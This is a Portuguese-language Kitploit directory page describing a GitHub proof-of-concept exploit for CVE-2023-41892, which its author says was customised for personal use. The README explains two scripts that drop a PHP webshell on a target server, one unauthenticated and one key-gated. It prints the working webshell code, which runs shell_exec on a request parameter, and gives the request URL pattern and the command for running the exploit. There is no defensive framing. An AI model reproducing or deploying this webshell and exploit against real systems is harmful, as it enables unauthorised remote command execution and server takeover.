Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-41892_poc — Personalizei isso para meu próprio uso | Kitploit
Ferramentas/GitHubGitHub/user01-1/cve-2023-41892_poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebComando e Controle
GitHubuser01-1/cve-2023-41892_poc

CVE-2023-41892_poc

Personalizei isso para meu próprio uso

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-41892_poc

Personalizado para meu próprio uso

poc_noauth.py

  • Webshell PHP de uma linha básico
  • Execução de comandos do SO via ?cmd=<comando>

poc_auth.py

  • Webshell com autenticação simples baseada em chave (comparação de hash SHA-256)
  • Só é possível executar comandos se a chave correta for fornecida
  • Modificação necessária no código:
    • Modificar a parte YOUR_SECRET_KEY na variável webshell dentro da função drop_payload para o valor hash SHA-256 da chave desejada
  • Instruções de uso:
    1. Substituir YOUR_SECRET_KEY no webshell pelo valor hash SHA-256 da chave em texto claro
    2. Ao fazer a requisição, enviar a chave em texto claro
      root@kitploit:~
      {target}/shell.php?k=<chave_em_texto_claro>&c=<comando>
      
Baixar ferramenta
  • Exemplo:
    1. Configuração: chave em texto claro = test1234
    2. Hash SHA256 via cyberchef ou similar: 937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
      • echo -n test1234 | sha256sum
      • cyberchef ou similar
    3. Modificação do código:
      root@kitploit:~
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      
  • Como usar

    python poc_noauth.py {alvo}